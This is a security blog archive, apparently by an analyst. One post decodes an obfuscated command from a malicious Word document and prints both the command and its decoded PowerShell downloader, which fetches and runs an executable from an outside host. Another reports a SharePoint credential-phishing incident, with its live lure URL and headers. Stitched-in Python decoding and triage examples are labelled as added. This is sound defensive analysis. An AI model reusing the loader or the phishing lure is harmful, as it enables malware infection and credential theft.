Wednesday, August 22, 2018

Fun Little Decoding of Obfuscated CMD Line to Run PowerShell Cmd

This came from a malicious Word doc titled John_Townsend_Request.doc.
SHA256 e1a68aaba205c7b7336d4f19627f54f891f5bc504372e575941d38cbcab42546

Original Command Line Arguments:

Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ ^:^ABoA^#4Ad^Q^A9^A^#4^A`Q^B^3AC^0^A^bwB^iA^#oA^`QB^j^A^gQA^IABO^A#U^A^dA
Au^AFcA^`^Q^Bi^A(^MAb^A^BpA#^U^Ab^$^B0ADsA^:^A^B^p^A#^$^A.A^A9^ACcA^a^AB0
^Ag^Q^AcAA6AC8^A^LwB^j^A^#8A^b$^Bn^A#n^A)$BlA^gIAL^$^B^j^A#^8^A^b^Q^Av^A^g
QAc^w^B0^AC^8A^aQBu^A#^QA^`Q^B4AC4^Ac^A^BoA^g^A^APw^B^s^AD0AcwBvA^#$A^
bwA1AC4Ad^ABrA#4^A:^w^AuA^FM^Ac^A^B^sA^#nAdAA^o^ACc^AQ^A^A+^ACnAO^w^A
n^A#nAd^A^B^F^ACA^APQ^A$^ACcA^\^w^A^4A^D(^A^:^wA7AC^QA^S^$^B^gAgU^A^P^Q
An^A#UAb^$B2A^D^oAcA^B,^A#I^Ab^A^Bp^A^#MAKw^A^+AF^w^A:wArAC^Q^A^aQ^B^0
^A(^UAKwA+AC4A^`Q^B^4A#U^A^:w^A^7A#Y^Abw^B^yA#^UAY^QBjA#$^AK^A^AnA^FQ
^AR^A^B^6ACA^A^a^QBuAC^A^A^:^A^Bp^A#$A.AApAgs^AdAByAgn^A)^w^An^A#^$^Ab$
^B^,^AC^4^AR^ABv^AgcAb^$^B^sA^#8A^YQBn^A(^Y^AaQ^Bs^A^#UA^K^AAn^A^FQ^AR^
A^B^6^AC^wA^I^AAnA(^oAR^wB^,ACn^AO^w^B^:^A#4Ad^$^Bv^A^#s^A`Q^A^tA(nAdAB^l
^A#^0A^IAAn^A(^oAR^w^B^,^AD^sAY$^By^A#U^AY^Q^Br^A^D^sA^f^QB^jA#(Ad^ABjA^#$^A)^w^B^9A^g0A^I^AA$AC^A^A^I^A^A$^ACA^AI^AA^$ACAA^I^AA^$^ACA
A^I^AA$^ACA^A^IAA$AA^=^=& sE^t ^ ^ Z^s^Lm=^!^UMn^l^:n=^k!& s^E^t ^ Rv^y=^!^Z^s^Lm:^g^=H^!& s^E^T ch^a^m=!Rv^y^:\=N^!& sE^T ^ ^dm=^!ch^a^m^:^$=^g^!&&S^e^T ^ ^ ^M^m^xs=^!^d^m:)=^e^!&&S^eT ^ ^ ^ H^J^o=^!^M^m^xs^:1=^z!& se^t ^ ^ ^q^zy=^!^H^J^o^::^=^J!&&s^et ^ ^x^e5C=!^q^zy:`^=^Z^!&& s^e^T ^ ^ ^ ^K^6^8=^!^x^e^5C^:^,^=^1!& se^t ^ ^ ^68V=!^K^6^8:^+^=n^!& se^T ^ q^F=!^6^8V^:(^=^E^!&& s^e^t ^ ^ ^8lW^m=^!q^F^:^.^=^W^!& S^ET E^3=^!^8^l^W^m:^#^=G^!&&ca^L^L %E^3%

Step 1. Remove Filler Noise character "^"


Cmd /v:O   /r seT   UMnl=pow)rsh)ll -) :ABoA#4AdQA9A#4A`QB3AC0AbwBiA#oA`QBjAgQAIABOA#UAdAAuAFcA`QBiA(MAbABp
A#UAb$B0ADsA:ABpA#$A.AA9ACcAaAB0AgQAcAA6AC8ALwBjA#8Ab$BnA#nA)$BlAgIAL
$BjA#8AbQAvAgQAcwB0AC8AaQBuA#QA`QB4AC4AcABoAgAAPwBsAD0AcwBvA#$AbwA
1AC4AdABrA#4A:wAuAFMAcABsA#nAdAAoACcAQAA+ACnAOwAnA#nAdABFACAAPQA$
ACcA\wA4AD(A:wA7ACQAS$BgAgUAPQAnA#UAb$B2ADoAcAB,A#IAbABpA#MAKwA+A
FwA:wArACQAaQB0A(UAKwA+AC4A`QB4A#UA:wA7A#YAbwByA#UAYQBjA#$AKAAnAF
QARAB6ACAAaQBuACAA:ABpA#$A.AApAgsAdAByAgnA)wAnA#$Ab$B,AC4ARABvAgcA
b$BsA#8AYQBnA(YAaQBsA#UAKAAnAFQARAB6ACwAIAAnA(oARwB,ACnAOwB:A#4Ad
$BvA#sA`QAtA(nAdABlA#0AIAAnA(oARwB,ADsAY$ByA#UAYQBrADsAfQBjA#(AdABjA#$A)wB9Ag0AIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$AA==
& sEt   ZsLm=!UMnl:n=k!& sEt  Rvy=!ZsLm:g=H!& sET cham=!Rvy:\=N!& sET  dm=!cham:$=g!&&SeT   Mmxs=!dm:)=e!&&SeT    HJo=!Mmxs:1=z!& set   qzy=!HJo::=J!&&set  xe5C=!qzy:`=Z!&& seT    K68=!xe5C:,=1!& set   68V=!K68:+=n!& seT  qF=!68V:(=E!&& set   8lWm=!qF:.=W!& SET E3=!8lWm:#=G!&&caLL %E3%

Step 2. Capture CMD line as it runs in Sandbox to get character substitutes


# = G
( and ) = E
` = Z
$ = g
n = k

powershell -e JABoAG4AdQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEM

Step 3. Base64 Decode


$�h�n�u�=�n�e�w�-�o�b�j�e�c�t� �N�e�t�.�W�e�b�C�l�i�e�n�t�;�$�i�h�X�=�'�h�t�t�p�:�/�/�c�o�n�d�i�z�e�r�.�c�o�m�/�t�s�t�/�i�n�d�e�x�.�p�h�p�?�l�=�s�o�h�o�3�.�t�k�n�'�.�S�p�l�i�t�(�'
�@�'�)�;�$�i�t�E� �=� �'�7�8�1�'�;�$�J�G�u�=�$�e�n�v�:�p�u�b�l�i�c�+�'�\�'�+�$�i�t
�E�+�'�.�e�x�e�'�;�f�o�r�e�a�c�h�(�$�T�D�z� �i�n� �$�i�h�X�)�{�t�r�y�{�$�h�n�u�.�D�o�w�n�l�o�a�d�F�i�l�e�(�$
�T�D�z�,� �$�J�G�u�)�;�I�n�v�o�k�e�-�I�t�e�m� �$�J�G�u�;�b�r�e�a�k�;�}�c�a�t�c�h�{�}�}� � � � � � � � � � � � � � � � � �

Step 4. Remove spacer character "�" (it is the null high byte of each UTF-16LE character: PowerShell's -e switch takes base64 of UTF-16LE text, so reading the decoded bytes as single-byte text shows a null between every letter)


(Decoded: $hnu=new-object Net.WebClient;$ihX='hxxp://condizer[.]com/tst/index.php?l=soho3.tkn'.Split('@');$itE = '781';$JGu=$env:public+'\'+$itE+'.exe';foreach($TDz in $ihX){try{$hnu.DownloadFile($TDz, $JGu);Invoke-Item $JGu;break;}catch{}} )
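The four steps above carried out in code, as an added example that is not from the post: strip the carets, replay the cmd set/substitution chain, then base64-decode the -e argument as UTF-16LE. The input is a constructed miniature of the same obfuscation rather than the post's full command line; only the variable names are borrowed from it.

```python
import base64
import re

# Constructed sample, not the command line from the post: the same technique
# at small scale. Carets are cmd escape characters that vanish at parse time,
# the payload is stored with stand-in characters, and a chain of delayed-
# expansion substitutions (!var:old=new!) restores the real text before
# "call %var%" runs it. "g" stands in for "h" and "$" for "g"; the chain
# order (g=h before $=g) is what keeps the reintroduced "g" intact.
SAMPLE = (
    "Cmd /v^:^O ^ /r s^e^T ^ ^ UM^nl=p^ow)rs^g)l^l -) ZQ^BjA#$A^bwA$A#$^AaQA="
    "& sE^t ^ Zs^Lm=^!UM^nl:g=h!& s^E^t ^ Rv^y=!Zs^Lm:)=e^!"
    "&&S^eT ^ ^ ch^am=!R^vy:$=g!& S^ET E^3=^!ch^am:#=G!&&ca^L^L %E^3%"
)

SET_RE = re.compile(r"\bset\s+(\w+)=([^&]*)", re.IGNORECASE)
SUBST_RE = re.compile(r"^!(\w+):(.+?)=(.*)!$")
CALL_RE = re.compile(r"\bcall\s+%(\w+)%", re.IGNORECASE)


def resolve_cmd(cmdline: str) -> str:
    """Steps 1 and 2: drop the carets, replay the set chain in order and
    return the string that call %var% hands to the shell."""
    flat = cmdline.replace("^", "")
    env = {}
    for name, value in SET_RE.findall(flat):
        m = SUBST_RE.match(value.strip())
        if m:
            src, old, new = m.groups()
            # cmd replaces every occurrence and matches old case-insensitively
            env[name] = re.sub(re.escape(old), lambda _: new, env[src],
                               flags=re.IGNORECASE)
        else:
            env[name] = value
    target = CALL_RE.search(flat)
    return env[target.group(1)] if target else flat


def decode_encoded_command(ps_cmdline: str) -> str:
    """Steps 3 and 4: -e carries base64 of UTF-16LE text, which is why every
    second byte showed up as a NUL "spacer" when read as single-byte text."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+(\S+)", ps_cmdline, re.IGNORECASE)
    return base64.b64decode(m.group(1)).decode("utf-16le")


if __name__ == "__main__":
    ps = resolve_cmd(SAMPLE)
    print(ps)                          # powershell -e ZQBjAGgAbwAgAGgAaQA=
    print(decode_encoded_command(ps))  # echo hi
```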

Tuesday, May 15, 2018

Sharepoint Email Phishing

Summary:
At about 12:33 PM Eastern an e-mail was delivered to multiple mailboxes within the company. It purported to be from an internal employee; the address was legitimate and was not obfuscated to hide a different originating address. There were at least two variations of the email. Both contained links to a malicious domain (sued[.]co[.]ke); the link was hidden behind alternate text that read "DownloadAttachments". Clicking the link would prompt some users to enter their email address and password.

The URL and parent domain were immediately added to the company's Umbrella solution to prevent any further DNS resolution of the domain when users click on the link.

The IP addresses that the link resolved to were added to the firewalls at all sites to be shunned.
It appears that approximately 35 – 40 users clicked on the link and entered credentials. All users that have contacted IT Support or HelpDesk have had their domain password changed.

Investigation indicates this email came from an external IP address and was not necessarily sent from an internal device. The originating IP address in the email header is unknown to threat intel resources. The address is located in Illinois, in a VPN block that belongs to LogicWeb. There are no domains hosted at this IP.
The email body was created in Gmail, as indicated by the tags around the source, and the alternate text for the Sharepoint logo appears to be in Spanish: img alt="Resultado de imagen para sharepoint logo"


Known malicious sample download
SHA256 - f9e8e6107cb0ff5ad3b891ad99580aac57eaa8f519c8ba9baa9c779d4b6f68f8
File Type: HTML
Magic: HTML document text
SSDeep: 768:DHxjTggziQuAr7SpF9G9h919/ozio/InD:6GiQuAr7SpEozio/ID
File Size: 28.77 KB
Main detection: Trojan.HTML.Phishing
Domain Info
Domain Name:  sued.co.ke

IP Addresses Resolved to:
·       208.91.199.87
·       162.213.252.60 <-- All our traffic was centered around this IP

[Screenshot of the email]

E-Mail Message Sample 1 Header and Source

Received: from BN7xxxxxxx113.xxxxxxx.prod.outlook.com (2603:10b6:4:ae::39) by
DMxxxxxB4105.xxxxxx.prod.outlook.com with HTTPS via
DM5xxxx0.NAMxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:33:27 +0000
Authentication-Results: domain.com; dkim=none (message not signed)
header.d=none;domain.com; dmarc=none action=none
header.from=<company name>;
.
.
.
From: "Dennis B. Manning" <dennis.manning@bioglobal.co>
To: "Dennis B. Manning" <dennis.manning@bioglobal.co>
Subject: INVOICE
Thread-Topic: INVOICE
X-MS-Exchange-Organization-MessageDirectionality: Originating
X-MS-Exchange-Organization-AuthSource: BN7PRxxxxmprd04.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [173.239.199.110]
X-MS-Exchange-Organization-Network-Message-Id: 61d1100c-e50e-4798-2591-08d5b9b868a9
X-MS-PublicTrafficType: Email
X-Microsoft-Exchange-Diagnostics: 1;BN7PR04MB4307;35:hYQ8ykDJvNTkVuzaeSsSAZpmmFrC1R5Ulntep7gMcSI/UhbDiIALU6UQOhBeYZY2UCllhTuswM3SWrmuDe6GIw==
X-MS-Exchange-Organization-ExpirationStartTime: 14 May 2018 16:33:22.6051
(UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason: Original Submit
X-MS-Exchange-Organization-ExpirationInterval: 2:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason: Original Submit
X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;

E-Mail Message Sample 2 Header and Source

Received: from BN7xxxx04.xxxxxxx4.prod.outlook.com (2603:10b6:4:ae::44) by
DxxxxxB4105.namprd04.prod.outlook.com with HTTPS via
DM5xxxx0115.NAxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:34:11 +0000
Received: from BNxxxxxB4050.xxxxxx.prod.outlook.com (20.176.18.18) by
BN7Pxxxx04.xxxx4.prod.outlook.com (20.xx6.xx.155) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.755.16; Mon, 14 May 2018 16:34:09 +0000
Authentication-Results: teijin.co.jp; dkim=none (message not signed)
header.d=none;teijin.co.jp; dmarc=none action=none
header.from=<Company name>;
.
.
.

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>
To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE
Thread-Topic: INVOICE
Date: Mon, 14 May 2018 16:34:04 +0000
X-Originating-IP: [173.239.199.110]


E-Mail Body Source Code (interesting sections)

<a href="http://sued.co.ke/sharepoint/sharepoint/" rel="noopener noreferrer" id="LPlnk981628" class="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-OWAAutoLink OWAAutoLink" target="_blank" style="color:rgb(17,85,204)" previewremoved="true"><font size="2" color="#1155CC"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-LPlnk375107" style="font-size:16px; background-color:transparent">DownloadAttachments</span></font></a>
.
.
.
<span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-ms-rterangepaste-start" style="font-size:16px; background-color:transparent"></span></font><img alt="Resultado de imagen para sharepoint logo" width="152" height="48" src="https://mvpcluster.com/wp-content/uploads/2016/03/0001-SP-2013-Logo.png"><font size="2" color="#1155CC"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-ms-rterangepaste-end" style="font-size:16px; background-color:transparent"></span>
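A triage check written here as an added example (not part of the post) that codifies the indicators the investigation above relied on: dkim=none with dmarc=none, a From address identical to the To address, an Exchange AuthAs of Internal paired with an external X-Originating-IP, and a lure link pointing outside the organisation. The message, addresses, internal ranges and mail domain are constructed placeholders, not the incident's real values.

```python
import email
import ipaddress
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed message modelled on Sample 1 above: header names and the lure text
# follow the post; addresses, originating IP and link target are placeholders.
SAMPLE_MSG = """\
Authentication-Results: example.com; dkim=none (message not signed)
 header.d=none;example.com; dmarc=none action=none header.from=example.com;
From: "Dennis B. Manning" <dennis.manning@example.com>
To: "Dennis B. Manning" <dennis.manning@example.com>
Subject: INVOICE
X-MS-Exchange-Organization-AuthAs: Internal
X-Originating-IP: [203.0.113.10]
Content-Type: text/html

<a href="http://phish.example.net/sharepoint/sharepoint/">DownloadAttachments</a>
"""

# Assumptions: the organisation's own address space and mail domain.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
ORG_DOMAIN = "example.com"
LINK_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def triage(raw: str) -> list:
    """Return the header and body indicators the investigation above relied on."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    auth = str(msg.get("Authentication-Results", ""))
    if "dkim=none" in auth and "dmarc=none" in auth:
        findings.append("no DKIM signature and no DMARC result")
    sender = parseaddr(str(msg.get("From", "")))[1].lower()
    if sender and sender == parseaddr(str(msg.get("To", "")))[1].lower():
        findings.append("From address equals To address")
    origin = str(msg.get("X-Originating-IP", "")).strip("[] ")
    if origin and str(msg.get("X-MS-Exchange-Organization-AuthAs", "")) == "Internal":
        ip = ipaddress.ip_address(origin)
        if not any(ip in net for net in INTERNAL_NETS):
            findings.append(f"AuthAs Internal but originating IP {ip} is external")
    for href, text in LINK_RE.findall(msg.get_content()):
        host = urlparse(href).hostname or ""
        if host != ORG_DOMAIN and not host.endswith("." + ORG_DOMAIN):
            findings.append(f'link "{text.strip()}" points to {host}')
    return findings
```

Running triage(SAMPLE_MSG) reports all four indicators for the constructed message; a legitimate internal mail with matching AuthAs and origin, distinct From/To and in-domain links produces none.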



First Query seen in SC
May 14 09:41:14 nnm: 10.x.x.101:53|10.x.x.111:53|17|7024|DNS Client Queries|PVS has observed this host perform a DNS lookup. The most recent DNS query performed was for: |sued.co.ke to the server at 10.x.x.111|

SecurityCenter Events
·       530 Web_Request events tracked by SC. Almost all were GET requests for .css files. The ones below were unique in the list of GET/POST events:

HTTP request detection|The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: POST;URI: /?wc-ajax=get_refreshed_fragments;Referer: http://sued.co.ke/sharepoint/sharepoint/Office%20365_files/SuiteServiceProxy.htm

Random Variations (showed up 4 or 5 times out of 140 events):
GET;URI: /s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhv.woff;
GET;URI: /sharepoint/sharepoint/Office%20365_files/shellwofficons_f991c945.woff;

Spam vs. Junk

...And what to do about it.


There is a difference between unwanted emails: there is spam and there is junk. Do you know what the difference is? Junk is anything that comes from a legitimate source, usually in the form of a marketing email. Spam comes from a less-than-ethical source and can take any form, usually with the intent of getting a user to click on a link. The link can then lead to a variety of sites with varying purposes. If the email is a 'phishing' email, then the intent is to get you to provide credentials or other sensitive information that can then be used by the threat actor to perform some nefarious action.

The other type of link delivers a piece of malicious software, usually without your consent or knowledge. This can allow even more serious activity to take place on your system and with your data. In rare cases, the link provides both a place to enter credentials and a download to your system. In all three cases, company data and personal data are placed at great risk.
Junk mail, on the other hand, just fills your mailbox and costs you the time it takes to delete it. Not nefarious, just a pain.

Training users to know the difference and how to respond to it can save a lot of work for the security analyst. 

For instance, Outlook has Junk E-mail Options. This can be a great tool for end users, but they must be trained on what it means for them and their daily mail habits: it will catch more than junk, and new addresses need to be added to the Safe Senders list on an ongoing basis.




Wednesday, March 21, 2018

Bring Out Your Dead, Bring Out Your Dead!

Well, as the title says, I am bringing out my dead. My dead blog, that is. I have been away for a couple of years and much has changed. I have progressed quite far now in my security field and have many new skills. I am hoping to share some of what I learn with you in what I hope will be an entertaining and educational way.
I am progressing into malware analysis and will be sharing the results of that, as far as samples I analyze and things I discover.
Also, I have something to say about recent events. To start with, the 'Slingshot' campaign, as discovered and named by Kaspersky. Earlier this month a report was published by Kaspersky detailing activity targeting many Middle East countries and some in Africa. It explained the hack was being done by hacking into Mikrotik routers. The main piece of malware being used by the group has been dubbed Slingshot, based on strings found by researchers.
Cyberscoop has now claimed that they have learned that Slingshot is actually an operation of the US military's Joint Special Operations Command, which is a component of Special Operations and is aimed at members of terrorist organizations such as ISIS and al-Qaeda. The source that gave the information to Cyberscoop has expressed concern that the exposure of the campaign may result in both the loss of a valuable surveillance program and the endangerment of the lives of US soldiers.
Most likely the Slingshot infrastructure has been abandoned following the disclosure.
Who knows what the repercussions from this will be; only time will tell.